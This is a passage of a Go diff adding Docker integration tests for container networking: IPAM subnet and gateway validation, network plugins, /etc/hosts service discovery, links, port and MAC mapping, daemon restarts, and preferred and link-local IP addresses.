"--gateway=172.28.5.254", "br0") + assertNwIsAvailable(c, "br0") + + nr := getNetworkResource(c, "br0") + c.Assert(nr.Driver, checker.Equals, "bridge") + c.Assert(nr.Scope, checker.Equals, "local") + 
c.Assert(nr.Internal, checker.Equals, false) + c.Assert(nr.EnableIPv6, checker.Equals, true) + c.Assert(nr.IPAM.Driver, checker.Equals, "default") + c.Assert(len(nr.IPAM.Config), checker.Equals, 2) + c.Assert(nr.IPAM.Config[0].Subnet, checker.Equals, "172.28.0.0/16") + c.Assert(nr.IPAM.Config[0].IPRange, checker.Equals, "172.28.5.0/24") + c.Assert(nr.IPAM.Config[0].Gateway, checker.Equals, "172.28.5.254") + c.Assert(nr.Internal, checker.False) + dockerCmd(c, "network", "rm", "br0") + assertNwNotAvailable(c, "br0") +} + +func (s *DockerNetworkSuite) TestDockerNetworkIPAMInvalidCombinations(c *check.C) { + // network with ip-range out of subnet range + _, _, err := dockerCmdWithError("network", "create", "--subnet=192.168.0.0/16", "--ip-range=192.170.0.0/16", "test") + c.Assert(err, check.NotNil) + + // network with multiple gateways for a single subnet + _, _, err = dockerCmdWithError("network", "create", "--subnet=192.168.0.0/16", "--gateway=192.168.0.1", "--gateway=192.168.0.2", "test") + c.Assert(err, check.NotNil) + + // Multiple overlapping subnets in the same network must fail + _, _, err = dockerCmdWithError("network", "create", "--subnet=192.168.0.0/16", "--subnet=192.168.1.0/16", "test") + c.Assert(err, check.NotNil) + + // overlapping subnets across networks must fail + // create a valid test0 network + dockerCmd(c, "network", "create", "--subnet=192.168.0.0/16", "test0") + assertNwIsAvailable(c, "test0") + // create an overlapping test1 network + _, _, err = dockerCmdWithError("network", "create", "--subnet=192.168.128.0/17", "test1") + c.Assert(err, check.NotNil) + dockerCmd(c, "network", "rm", "test0") + assertNwNotAvailable(c, "test0") +} + +func (s *DockerNetworkSuite) TestDockerNetworkDriverOptions(c *check.C) { + dockerCmd(c, "network", "create", "-d", dummyNetworkDriver, "-o", "opt1=drv1", "-o", "opt2=drv2", "testopt") + assertNwIsAvailable(c, "testopt") + gopts := remoteDriverNetworkRequest.Options[netlabel.GenericData] + c.Assert(gopts, 
checker.NotNil) + opts, ok := gopts.(map[string]interface{}) + c.Assert(ok, checker.Equals, true) + c.Assert(opts["opt1"], checker.Equals, "drv1") + c.Assert(opts["opt2"], checker.Equals, "drv2") + dockerCmd(c, "network", "rm", "testopt") + assertNwNotAvailable(c, "testopt") + +} + +func (s *DockerNetworkSuite) TestDockerPluginV2NetworkDriver(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + + var ( + npName = "tiborvass/test-docker-netplugin" + npTag = "latest" + npNameWithTag = npName + ":" + npTag + ) + _, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", npNameWithTag) + c.Assert(err, checker.IsNil) + + out, _, err := dockerCmdWithError("plugin", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, npName) + c.Assert(out, checker.Contains, npTag) + c.Assert(out, checker.Contains, "true") + + dockerCmd(c, "network", "create", "-d", npNameWithTag, "v2net") + assertNwIsAvailable(c, "v2net") + dockerCmd(c, "network", "rm", "v2net") + assertNwNotAvailable(c, "v2net") + +} + +func (s *DockerDaemonSuite) TestDockerNetworkNoDiscoveryDefaultBridgeNetwork(c *check.C) { + testRequires(c, ExecSupport) + // On default bridge network built-in service discovery should not happen + hostsFile := "/etc/hosts" + bridgeName := "external-bridge" + bridgeIP := "192.169.255.254/24" + out, err := createInterface(c, "bridge", bridgeName, bridgeIP) + c.Assert(err, check.IsNil, check.Commentf(out)) + defer deleteInterface(c, bridgeName) + + err = s.d.StartWithBusybox("--bridge", bridgeName) + c.Assert(err, check.IsNil) + defer s.d.Restart() + + // run two containers and store first container's etc/hosts content + out, err = s.d.Cmd("run", "-d", "busybox", "top") + c.Assert(err, check.IsNil) + cid1 := strings.TrimSpace(out) + defer s.d.Cmd("stop", cid1) + + hosts, err := s.d.Cmd("exec", cid1, "cat", hostsFile) + c.Assert(err, checker.IsNil) + + out, err = s.d.Cmd("run", "-d", "--name", "container2", "busybox", "top") + 
c.Assert(err, check.IsNil) + cid2 := strings.TrimSpace(out) + + // verify first container's etc/hosts file has not changed after spawning the second named container + hostsPost, err := s.d.Cmd("exec", cid1, "cat", hostsFile) + c.Assert(err, checker.IsNil) + c.Assert(string(hosts), checker.Equals, string(hostsPost), + check.Commentf("Unexpected %s change on second container creation", hostsFile)) + + // stop container 2 and verify first container's etc/hosts has not changed + _, err = s.d.Cmd("stop", cid2) + c.Assert(err, check.IsNil) + + hostsPost, err = s.d.Cmd("exec", cid1, "cat", hostsFile) + c.Assert(err, checker.IsNil) + c.Assert(string(hosts), checker.Equals, string(hostsPost), + check.Commentf("Unexpected %s change on second container creation", hostsFile)) + + // but discovery is on when connecting to non default bridge network + network := "anotherbridge" + out, err = s.d.Cmd("network", "create", network) + c.Assert(err, check.IsNil, check.Commentf(out)) + defer s.d.Cmd("network", "rm", network) + + out, err = s.d.Cmd("network", "connect", network, cid1) + c.Assert(err, check.IsNil, check.Commentf(out)) + + hosts, err = s.d.Cmd("exec", cid1, "cat", hostsFile) + c.Assert(err, checker.IsNil) + + hostsPost, err = s.d.Cmd("exec", cid1, "cat", hostsFile) + c.Assert(err, checker.IsNil) + c.Assert(string(hosts), checker.Equals, string(hostsPost), + check.Commentf("Unexpected %s change on second network connection", hostsFile)) +} + +func (s *DockerNetworkSuite) TestDockerNetworkAnonymousEndpoint(c *check.C) { + testRequires(c, ExecSupport, NotArm) + hostsFile := "/etc/hosts" + cstmBridgeNw := "custom-bridge-nw" + cstmBridgeNw1 := "custom-bridge-nw1" + + dockerCmd(c, "network", "create", "-d", "bridge", cstmBridgeNw) + assertNwIsAvailable(c, cstmBridgeNw) + + // run two anonymous containers and store their etc/hosts content + out, _ := dockerCmd(c, "run", "-d", "--net", cstmBridgeNw, "busybox", "top") + cid1 := strings.TrimSpace(out) + + hosts1, err := 
readContainerFileWithExec(cid1, hostsFile) + c.Assert(err, checker.IsNil) + + out, _ = dockerCmd(c, "run", "-d", "--net", cstmBridgeNw, "busybox", "top") + cid2 := strings.TrimSpace(out) + + hosts2, err := readContainerFileWithExec(cid2, hostsFile) + c.Assert(err, checker.IsNil) + + // verify first container etc/hosts file has not changed + hosts1post, err := readContainerFileWithExec(cid1, hostsFile) + c.Assert(err, checker.IsNil) + c.Assert(string(hosts1), checker.Equals, string(hosts1post), + check.Commentf("Unexpected %s change on anonymous container creation", hostsFile)) + + // Connect the 2nd container to a new network and verify the + // first container /etc/hosts file still hasn't changed. + dockerCmd(c, "network", "create", "-d", "bridge", cstmBridgeNw1) + assertNwIsAvailable(c, cstmBridgeNw1) + + dockerCmd(c, "network", "connect", cstmBridgeNw1, cid2) + + hosts2, err = readContainerFileWithExec(cid2, hostsFile) + c.Assert(err, checker.IsNil) + + hosts1post, err = readContainerFileWithExec(cid1, hostsFile) + c.Assert(err, checker.IsNil) + c.Assert(string(hosts1), checker.Equals, string(hosts1post), + check.Commentf("Unexpected %s change on container connect", hostsFile)) + + // start a named container + cName := "AnyName" + out, _ = dockerCmd(c, "run", "-d", "--net", cstmBridgeNw, "--name", cName, "busybox", "top") + cid3 := strings.TrimSpace(out) + + // verify that container 1 and 2 can ping the named container + dockerCmd(c, "exec", cid1, "ping", "-c", "1", cName) + dockerCmd(c, "exec", cid2, "ping", "-c", "1", cName) + + // Stop named container and verify first two containers' etc/hosts file hasn't changed + dockerCmd(c, "stop", cid3) + hosts1post, err = readContainerFileWithExec(cid1, hostsFile) + c.Assert(err, checker.IsNil) + c.Assert(string(hosts1), checker.Equals, string(hosts1post), + check.Commentf("Unexpected %s change on name container creation", hostsFile)) + + hosts2post, err := readContainerFileWithExec(cid2, hostsFile) + c.Assert(err, 
checker.IsNil) + c.Assert(string(hosts2), checker.Equals, string(hosts2post), + check.Commentf("Unexpected %s change on name container creation", hostsFile)) + + // verify that container 1 and 2 can't ping the named container now + _, _, err = dockerCmdWithError("exec", cid1, "ping", "-c", "1", cName) + c.Assert(err, check.NotNil) + _, _, err = dockerCmdWithError("exec", cid2, "ping", "-c", "1", cName) + c.Assert(err, check.NotNil) +} + +func (s *DockerNetworkSuite) TestDockerNetworkLinkOnDefaultNetworkOnly(c *check.C) { + // Legacy Link feature must work only on default network, and not across networks + cnt1 := "container1" + cnt2 := "container2" + network := "anotherbridge" + + // Run first container on default network + dockerCmd(c, "run", "-d", "--name", cnt1, "busybox", "top") + + // Create another network and run the second container on it + dockerCmd(c, "network", "create", network) + assertNwIsAvailable(c, network) + dockerCmd(c, "run", "-d", "--net", network, "--name", cnt2, "busybox", "top") + + // Try launching a container on default network, linking to the first container. Must succeed + dockerCmd(c, "run", "-d", "--link", fmt.Sprintf("%s:%s", cnt1, cnt1), "busybox", "top") + + // Try launching a container on default network, linking to the second container. Must fail + _, _, err := dockerCmdWithError("run", "-d", "--link", fmt.Sprintf("%s:%s", cnt2, cnt2), "busybox", "top") + c.Assert(err, checker.NotNil) + + // Connect second container to default network. 
Now a container on default network can link to it + dockerCmd(c, "network", "connect", "bridge", cnt2) + dockerCmd(c, "run", "-d", "--link", fmt.Sprintf("%s:%s", cnt2, cnt2), "busybox", "top") +} + +func (s *DockerNetworkSuite) TestDockerNetworkOverlayPortMapping(c *check.C) { + // Verify exposed ports are present in ps output when running a container on + // a network managed by a driver which does not provide the default gateway + // for the container + nwn := "ov" + ctn := "bb" + port1 := 80 + port2 := 443 + expose1 := fmt.Sprintf("--expose=%d", port1) + expose2 := fmt.Sprintf("--expose=%d", port2) + + dockerCmd(c, "network", "create", "-d", dummyNetworkDriver, nwn) + assertNwIsAvailable(c, nwn) + + dockerCmd(c, "run", "-d", "--net", nwn, "--name", ctn, expose1, expose2, "busybox", "top") + + // Check docker ps o/p for last created container reports the unpublished ports + unpPort1 := fmt.Sprintf("%d/tcp", port1) + unpPort2 := fmt.Sprintf("%d/tcp", port2) + out, _ := dockerCmd(c, "ps", "-n=1") + // Missing unpublished ports in docker ps output + c.Assert(out, checker.Contains, unpPort1) + // Missing unpublished ports in docker ps output + c.Assert(out, checker.Contains, unpPort2) +} + +func (s *DockerNetworkSuite) TestDockerNetworkDriverUngracefulRestart(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + dnd := "dnd" + did := "did" + + mux := http.NewServeMux() + server := httptest.NewServer(mux) + setupRemoteNetworkDrivers(c, mux, server.URL, dnd, did) + + s.d.StartWithBusybox() + _, err := s.d.Cmd("network", "create", "-d", dnd, "--subnet", "1.1.1.0/24", "net1") + c.Assert(err, checker.IsNil) + + _, err = s.d.Cmd("run", "-itd", "--net", "net1", "--name", "foo", "--ip", "1.1.1.10", "busybox", "sh") + c.Assert(err, checker.IsNil) + + // Kill daemon and restart + if err = s.d.cmd.Process.Kill(); err != nil { + c.Fatal(err) + } + + server.Close() + + startTime := time.Now().Unix() + if err = s.d.Restart(); err != nil { + c.Fatal(err) + } + lapse := 
time.Now().Unix() - startTime + if lapse > 60 { + // In normal scenarios, daemon restart takes ~1 second. + // Plugin retry mechanism can delay the daemon start. systemd may not like it. + // Avoid accessing plugins during daemon bootup + c.Logf("daemon restart took too long : %d seconds", lapse) + } + + // Restart the custom dummy plugin + mux = http.NewServeMux() + server = httptest.NewServer(mux) + setupRemoteNetworkDrivers(c, mux, server.URL, dnd, did) + + // trying to reuse the same ip must succeed + _, err = s.d.Cmd("run", "-itd", "--net", "net1", "--name", "bar", "--ip", "1.1.1.10", "busybox", "sh") + c.Assert(err, checker.IsNil) +} + +func (s *DockerNetworkSuite) TestDockerNetworkMacInspect(c *check.C) { + // Verify endpoint MAC address is correctly populated in container's network settings + nwn := "ov" + ctn := "bb" + + dockerCmd(c, "network", "create", "-d", dummyNetworkDriver, nwn) + assertNwIsAvailable(c, nwn) + + dockerCmd(c, "run", "-d", "--net", nwn, "--name", ctn, "busybox", "top") + + mac := inspectField(c, ctn, "NetworkSettings.Networks."+nwn+".MacAddress") + c.Assert(mac, checker.Equals, "a0:b1:c2:d3:e4:f5") +} + +func (s *DockerSuite) TestInspectAPIMultipleNetworks(c *check.C) { + dockerCmd(c, "network", "create", "mybridge1") + dockerCmd(c, "network", "create", "mybridge2") + out, _ := dockerCmd(c, "run", "-d", "busybox", "top") + id := strings.TrimSpace(out) + c.Assert(waitRun(id), check.IsNil) + + dockerCmd(c, "network", "connect", "mybridge1", id) + dockerCmd(c, "network", "connect", "mybridge2", id) + + body := getInspectBody(c, "v1.20", id) + var inspect120 v1p20.ContainerJSON + err := json.Unmarshal(body, &inspect120) + c.Assert(err, checker.IsNil) + + versionedIP := inspect120.NetworkSettings.IPAddress + + body = getInspectBody(c, "v1.21", id) + var inspect121 types.ContainerJSON + err = json.Unmarshal(body, &inspect121) + c.Assert(err, checker.IsNil) + c.Assert(inspect121.NetworkSettings.Networks, checker.HasLen, 3) + + bridge := 
inspect121.NetworkSettings.Networks["bridge"] + c.Assert(bridge.IPAddress, checker.Equals, versionedIP) + c.Assert(bridge.IPAddress, checker.Equals, inspect121.NetworkSettings.IPAddress) +} + +func connectContainerToNetworks(c *check.C, d *Daemon, cName string, nws []string) { + // Run a container on the default network + out, err := d.Cmd("run", "-d", "--name", cName, "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // Attach the container to other networks + for _, nw := range nws { + out, err = d.Cmd("network", "create", nw) + c.Assert(err, checker.IsNil, check.Commentf(out)) + out, err = d.Cmd("network", "connect", nw, cName) + c.Assert(err, checker.IsNil, check.Commentf(out)) + } +} + +func verifyContainerIsConnectedToNetworks(c *check.C, d *Daemon, cName string, nws []string) { + // Verify container is connected to all the networks + for _, nw := range nws { + out, err := d.Cmd("inspect", "-f", fmt.Sprintf("{{.NetworkSettings.Networks.%s}}", nw), cName) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(out, checker.Not(checker.Equals), "\n") + } +} + +func (s *DockerNetworkSuite) TestDockerNetworkMultipleNetworksGracefulDaemonRestart(c *check.C) { + cName := "bb" + nwList := []string{"nw1", "nw2", "nw3"} + + s.d.StartWithBusybox() + + connectContainerToNetworks(c, s.d, cName, nwList) + verifyContainerIsConnectedToNetworks(c, s.d, cName, nwList) + + // Reload daemon + s.d.Restart() + + _, err := s.d.Cmd("start", cName) + c.Assert(err, checker.IsNil) + + verifyContainerIsConnectedToNetworks(c, s.d, cName, nwList) +} + +func (s *DockerNetworkSuite) TestDockerNetworkMultipleNetworksUngracefulDaemonRestart(c *check.C) { + cName := "cc" + nwList := []string{"nw1", "nw2", "nw3"} + + s.d.StartWithBusybox() + + connectContainerToNetworks(c, s.d, cName, nwList) + verifyContainerIsConnectedToNetworks(c, s.d, cName, nwList) + + // Kill daemon and restart + if err := s.d.cmd.Process.Kill(); err != nil { + c.Fatal(err) + } + 
s.d.Restart() + + // Restart container + _, err := s.d.Cmd("start", cName) + c.Assert(err, checker.IsNil) + + verifyContainerIsConnectedToNetworks(c, s.d, cName, nwList) +} + +func (s *DockerNetworkSuite) TestDockerNetworkRunNetByID(c *check.C) { + out, _ := dockerCmd(c, "network", "create", "one") + containerOut, _, err := dockerCmdWithError("run", "-d", "--net", strings.TrimSpace(out), "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(containerOut)) +} + +func (s *DockerNetworkSuite) TestDockerNetworkHostModeUngracefulDaemonRestart(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + s.d.StartWithBusybox() + + // Run a few containers on host network + for i := 0; i < 10; i++ { + cName := fmt.Sprintf("hostc-%d", i) + out, err := s.d.Cmd("run", "-d", "--name", cName, "--net=host", "--restart=always", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // verfiy container has finished starting before killing daemon + err = s.d.waitRun(cName) + c.Assert(err, checker.IsNil) + } + + // Kill daemon ungracefully and restart + if err := s.d.cmd.Process.Kill(); err != nil { + c.Fatal(err) + } + if err := s.d.Restart(); err != nil { + c.Fatal(err) + } + + // make sure all the containers are up and running + for i := 0; i < 10; i++ { + err := s.d.waitRun(fmt.Sprintf("hostc-%d", i)) + c.Assert(err, checker.IsNil) + } +} + +func (s *DockerNetworkSuite) TestDockerNetworkConnectToHostFromOtherNetwork(c *check.C) { + dockerCmd(c, "run", "-d", "--name", "container1", "busybox", "top") + c.Assert(waitRun("container1"), check.IsNil) + dockerCmd(c, "network", "disconnect", "bridge", "container1") + out, _, err := dockerCmdWithError("network", "connect", "host", "container1") + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, runconfig.ErrConflictHostNetwork.Error()) +} + +func (s *DockerNetworkSuite) TestDockerNetworkDisconnectFromHost(c *check.C) { + dockerCmd(c, "run", "-d", "--name", 
"container1", "--net=host", "busybox", "top") + c.Assert(waitRun("container1"), check.IsNil) + out, _, err := dockerCmdWithError("network", "disconnect", "host", "container1") + c.Assert(err, checker.NotNil, check.Commentf("Should err out disconnect from host")) + c.Assert(out, checker.Contains, runconfig.ErrConflictHostNetwork.Error()) +} + +func (s *DockerNetworkSuite) TestDockerNetworkConnectWithPortMapping(c *check.C) { + testRequires(c, NotArm) + dockerCmd(c, "network", "create", "test1") + dockerCmd(c, "run", "-d", "--name", "c1", "-p", "5000:5000", "busybox", "top") + c.Assert(waitRun("c1"), check.IsNil) + dockerCmd(c, "network", "connect", "test1", "c1") +} + +func verifyPortMap(c *check.C, container, port, originalMapping string, mustBeEqual bool) { + chk := checker.Equals + if !mustBeEqual { + chk = checker.Not(checker.Equals) + } + currentMapping, _ := dockerCmd(c, "port", container, port) + c.Assert(currentMapping, chk, originalMapping) +} + +func (s *DockerNetworkSuite) TestDockerNetworkConnectDisconnectWithPortMapping(c *check.C) { + // Connect and disconnect a container with explicit and non-explicit + // host port mapping to/from networks which do cause and do not cause + // the container default gateway to change, and verify docker port cmd + // returns congruent information + testRequires(c, NotArm) + cnt := "c1" + dockerCmd(c, "network", "create", "aaa") + dockerCmd(c, "network", "create", "ccc") + + dockerCmd(c, "run", "-d", "--name", cnt, "-p", "9000:90", "-p", "70", "busybox", "top") + c.Assert(waitRun(cnt), check.IsNil) + curPortMap, _ := dockerCmd(c, "port", cnt, "70") + curExplPortMap, _ := dockerCmd(c, "port", cnt, "90") + + // Connect to a network which causes the container's default gw switch + dockerCmd(c, "network", "connect", "aaa", cnt) + verifyPortMap(c, cnt, "70", curPortMap, false) + verifyPortMap(c, cnt, "90", curExplPortMap, true) + + // Read current mapping + curPortMap, _ = dockerCmd(c, "port", cnt, "70") + + // Disconnect 
from a network which causes the container's default gw switch + dockerCmd(c, "network", "disconnect", "aaa", cnt) + verifyPortMap(c, cnt, "70", curPortMap, false) + verifyPortMap(c, cnt, "90", curExplPortMap, true) + + // Read current mapping + curPortMap, _ = dockerCmd(c, "port", cnt, "70") + + // Connect to a network which does not cause the container's default gw switch + dockerCmd(c, "network", "connect", "ccc", cnt) + verifyPortMap(c, cnt, "70", curPortMap, true) + verifyPortMap(c, cnt, "90", curExplPortMap, true) +} + +func (s *DockerNetworkSuite) TestDockerNetworkConnectWithMac(c *check.C) { + macAddress := "02:42:ac:11:00:02" + dockerCmd(c, "network", "create", "mynetwork") + dockerCmd(c, "run", "--name=test", "-d", "--mac-address", macAddress, "busybox", "top") + c.Assert(waitRun("test"), check.IsNil) + mac1 := inspectField(c, "test", "NetworkSettings.Networks.bridge.MacAddress") + c.Assert(strings.TrimSpace(mac1), checker.Equals, macAddress) + dockerCmd(c, "network", "connect", "mynetwork", "test") + mac2 := inspectField(c, "test", "NetworkSettings.Networks.mynetwork.MacAddress") + c.Assert(strings.TrimSpace(mac2), checker.Not(checker.Equals), strings.TrimSpace(mac1)) +} + +func (s *DockerNetworkSuite) TestDockerNetworkInspectCreatedContainer(c *check.C) { + dockerCmd(c, "create", "--name", "test", "busybox") + networks := inspectField(c, "test", "NetworkSettings.Networks") + c.Assert(networks, checker.Contains, "bridge", check.Commentf("Should return 'bridge' network")) +} + +func (s *DockerNetworkSuite) TestDockerNetworkRestartWithMultipleNetworks(c *check.C) { + dockerCmd(c, "network", "create", "test") + dockerCmd(c, "run", "--name=foo", "-d", "busybox", "top") + c.Assert(waitRun("foo"), checker.IsNil) + dockerCmd(c, "network", "connect", "test", "foo") + dockerCmd(c, "restart", "foo") + networks := inspectField(c, "foo", "NetworkSettings.Networks") + c.Assert(networks, checker.Contains, "bridge", check.Commentf("Should contain 'bridge' network")) + 
c.Assert(networks, checker.Contains, "test", check.Commentf("Should contain 'test' network")) +} + +func (s *DockerNetworkSuite) TestDockerNetworkConnectDisconnectToStoppedContainer(c *check.C) { + dockerCmd(c, "network", "create", "test") + dockerCmd(c, "create", "--name=foo", "busybox", "top") + dockerCmd(c, "network", "connect", "test", "foo") + networks := inspectField(c, "foo", "NetworkSettings.Networks") + c.Assert(networks, checker.Contains, "test", check.Commentf("Should contain 'test' network")) + + // Restart docker daemon to test the config has persisted to disk + s.d.Restart() + networks = inspectField(c, "foo", "NetworkSettings.Networks") + c.Assert(networks, checker.Contains, "test", check.Commentf("Should contain 'test' network")) + + // start the container and test if we can ping it from another container in the same network + dockerCmd(c, "start", "foo") + c.Assert(waitRun("foo"), checker.IsNil) + ip := inspectField(c, "foo", "NetworkSettings.Networks.test.IPAddress") + ip = strings.TrimSpace(ip) + dockerCmd(c, "run", "--net=test", "busybox", "sh", "-c", fmt.Sprintf("ping -c 1 %s", ip)) + + dockerCmd(c, "stop", "foo") + + // Test disconnect + dockerCmd(c, "network", "disconnect", "test", "foo") + networks = inspectField(c, "foo", "NetworkSettings.Networks") + c.Assert(networks, checker.Not(checker.Contains), "test", check.Commentf("Should not contain 'test' network")) + + // Restart docker daemon to test the config has persisted to disk + s.d.Restart() + networks = inspectField(c, "foo", "NetworkSettings.Networks") + c.Assert(networks, checker.Not(checker.Contains), "test", check.Commentf("Should not contain 'test' network")) + +} + +func (s *DockerNetworkSuite) TestDockerNetworkDisconnectContainerNonexistingNetwork(c *check.C) { + dockerCmd(c, "network", "create", "test") + dockerCmd(c, "run", "--net=test", "-d", "--name=foo", "busybox", "top") + networks := inspectField(c, "foo", "NetworkSettings.Networks") + c.Assert(networks, checker.Contains, 
"test", check.Commentf("Should contain 'test' network")) + + // Stop container and remove network + dockerCmd(c, "stop", "foo") + dockerCmd(c, "network", "rm", "test") + + // Test disconnecting stopped container from nonexisting network + dockerCmd(c, "network", "disconnect", "-f", "test", "foo") + networks = inspectField(c, "foo", "NetworkSettings.Networks") + c.Assert(networks, checker.Not(checker.Contains), "test", check.Commentf("Should not contain 'test' network")) +} + +func (s *DockerNetworkSuite) TestDockerNetworkConnectPreferredIP(c *check.C) { + // create two networks + dockerCmd(c, "network", "create", "--ipv6", "--subnet=172.28.0.0/16", "--subnet=2001:db8:1234::/64", "n0") + assertNwIsAvailable(c, "n0") + + dockerCmd(c, "network", "create", "--ipv6", "--subnet=172.30.0.0/16", "--ip-range=172.30.5.0/24", "--subnet=2001:db8:abcd::/64", "--ip-range=2001:db8:abcd::/80", "n1") + assertNwIsAvailable(c, "n1") + + // run a container on first network specifying the ip addresses + dockerCmd(c, "run", "-d", "--name", "c0", "--net=n0", "--ip", "172.28.99.88", "--ip6", "2001:db8:1234::9988", "busybox", "top") + c.Assert(waitRun("c0"), check.IsNil) + verifyIPAddressConfig(c, "c0", "n0", "172.28.99.88", "2001:db8:1234::9988") + verifyIPAddresses(c, "c0", "n0", "172.28.99.88", "2001:db8:1234::9988") + + // connect the container to the second network specifying an ip addresses + dockerCmd(c, "network", "connect", "--ip", "172.30.55.44", "--ip6", "2001:db8:abcd::5544", "n1", "c0") + verifyIPAddressConfig(c, "c0", "n1", "172.30.55.44", "2001:db8:abcd::5544") + verifyIPAddresses(c, "c0", "n1", "172.30.55.44", "2001:db8:abcd::5544") + + // Stop and restart the container + dockerCmd(c, "stop", "c0") + dockerCmd(c, "start", "c0") + + // verify requested addresses are applied and configs are still there + verifyIPAddressConfig(c, "c0", "n0", "172.28.99.88", "2001:db8:1234::9988") + verifyIPAddresses(c, "c0", "n0", "172.28.99.88", "2001:db8:1234::9988") + 
verifyIPAddressConfig(c, "c0", "n1", "172.30.55.44", "2001:db8:abcd::5544") + verifyIPAddresses(c, "c0", "n1", "172.30.55.44", "2001:db8:abcd::5544") + + // Still it should fail to connect to the default network with a specified IP (whatever ip) + out, _, err := dockerCmdWithError("network", "connect", "--ip", "172.21.55.44", "bridge", "c0") + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + c.Assert(out, checker.Contains, runconfig.ErrUnsupportedNetworkAndIP.Error()) + +} + +func (s *DockerNetworkSuite) TestDockerNetworkConnectPreferredIPStoppedContainer(c *check.C) { + // create a container + dockerCmd(c, "create", "--name", "c0", "busybox", "top") + + // create a network + dockerCmd(c, "network", "create", "--ipv6", "--subnet=172.30.0.0/16", "--subnet=2001:db8:abcd::/64", "n0") + assertNwIsAvailable(c, "n0") + + // connect the container to the network specifying an ip addresses + dockerCmd(c, "network", "connect", "--ip", "172.30.55.44", "--ip6", "2001:db8:abcd::5544", "n0", "c0") + verifyIPAddressConfig(c, "c0", "n0", "172.30.55.44", "2001:db8:abcd::5544") + + // start the container, verify config has not changed and ip addresses are assigned + dockerCmd(c, "start", "c0") + c.Assert(waitRun("c0"), check.IsNil) + verifyIPAddressConfig(c, "c0", "n0", "172.30.55.44", "2001:db8:abcd::5544") + verifyIPAddresses(c, "c0", "n0", "172.30.55.44", "2001:db8:abcd::5544") + + // stop the container and check ip config has not changed + dockerCmd(c, "stop", "c0") + verifyIPAddressConfig(c, "c0", "n0", "172.30.55.44", "2001:db8:abcd::5544") +} + +func (s *DockerNetworkSuite) TestDockerNetworkUnsupportedRequiredIP(c *check.C) { + // requested IP is not supported on predefined networks + for _, mode := range []string{"none", "host", "bridge", "default"} { + checkUnsupportedNetworkAndIP(c, mode) + } + + // requested IP is not supported on networks with no user defined subnets + dockerCmd(c, "network", "create", "n0") + assertNwIsAvailable(c, "n0") + + out, _, err 
:= dockerCmdWithError("run", "-d", "--ip", "172.28.99.88", "--net", "n0", "busybox", "top") + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + c.Assert(out, checker.Contains, runconfig.ErrUnsupportedNetworkNoSubnetAndIP.Error()) + + out, _, err = dockerCmdWithError("run", "-d", "--ip6", "2001:db8:1234::9988", "--net", "n0", "busybox", "top") + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + c.Assert(out, checker.Contains, runconfig.ErrUnsupportedNetworkNoSubnetAndIP.Error()) + + dockerCmd(c, "network", "rm", "n0") + assertNwNotAvailable(c, "n0") +} + +func checkUnsupportedNetworkAndIP(c *check.C, nwMode string) { + out, _, err := dockerCmdWithError("run", "-d", "--net", nwMode, "--ip", "172.28.99.88", "--ip6", "2001:db8:1234::9988", "busybox", "top") + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + c.Assert(out, checker.Contains, runconfig.ErrUnsupportedNetworkAndIP.Error()) +} + +func verifyIPAddressConfig(c *check.C, cName, nwname, ipv4, ipv6 string) { + if ipv4 != "" { + out := inspectField(c, cName, fmt.Sprintf("NetworkSettings.Networks.%s.IPAMConfig.IPv4Address", nwname)) + c.Assert(strings.TrimSpace(out), check.Equals, ipv4) + } + + if ipv6 != "" { + out := inspectField(c, cName, fmt.Sprintf("NetworkSettings.Networks.%s.IPAMConfig.IPv6Address", nwname)) + c.Assert(strings.TrimSpace(out), check.Equals, ipv6) + } +} + +func verifyIPAddresses(c *check.C, cName, nwname, ipv4, ipv6 string) { + out := inspectField(c, cName, fmt.Sprintf("NetworkSettings.Networks.%s.IPAddress", nwname)) + c.Assert(strings.TrimSpace(out), check.Equals, ipv4) + + out = inspectField(c, cName, fmt.Sprintf("NetworkSettings.Networks.%s.GlobalIPv6Address", nwname)) + c.Assert(strings.TrimSpace(out), check.Equals, ipv6) +} + +func (s *DockerNetworkSuite) TestDockerNetworkConnectLinkLocalIP(c *check.C) { + // create one test network + dockerCmd(c, "network", "create", "n0") + assertNwIsAvailable(c, "n0") + + // run a container with incorrect 
link-local address + _, _, err := dockerCmdWithError("run", "--link-local-ip", "169.253.5.5", "busybox", "top") + c.Assert(err, check.NotNil) + _, _, err = dockerCmdWithError("run", "--link-local-ip", "2001:db8::89", "busybox", "top") + c.Assert(err, check.NotNil) + + // run two containers with link-local ip on the test network + dockerCmd(c, "run", "-d", "--name", "c0", "--net=n0", "--link-local-ip", "169.254.7.7", "--link-local-ip", "fe80::254:77", "busybox", "top") + c.Assert(waitRun("c0"), check.IsNil) + dockerCmd(c, "run", "-d", "--name", "c1", "--net=n0", "--link-local-ip", "169.254.8.8", "--link-local-ip", "fe80::254:88", "busybox", "top") + c.Assert(waitRun("c1"), check.IsNil) + + // run a container on the default network and connect it to the test network specifying a link-local address + dockerCmd(c, "run", "-d", "--name", "c2", "busybox", "top") + c.Assert(waitRun("c2"), check.IsNil) + dockerCmd(c, "network", "connect", "--link-local-ip", "169.254.9.9", "n0", "c2") + + // verify the three containers can ping each other via the link-local addresses + _, _, err = dockerCmdWithError("exec", "c0", "ping", "-c", "1", "169.254.8.8") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "c1", "ping", "-c", "1", "169.254.9.9") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "c2", "ping", "-c", "1", "169.254.7.7") + c.Assert(err, check.IsNil) + + // Stop and restart the three containers + dockerCmd(c, "stop", "c0") + dockerCmd(c, "stop", "c1") + dockerCmd(c, "stop", "c2") + dockerCmd(c, "start", "c0") + dockerCmd(c, "start", "c1") + dockerCmd(c, "start", "c2") + + // verify the ping again + _, _, err = dockerCmdWithError("exec", "c0", "ping", 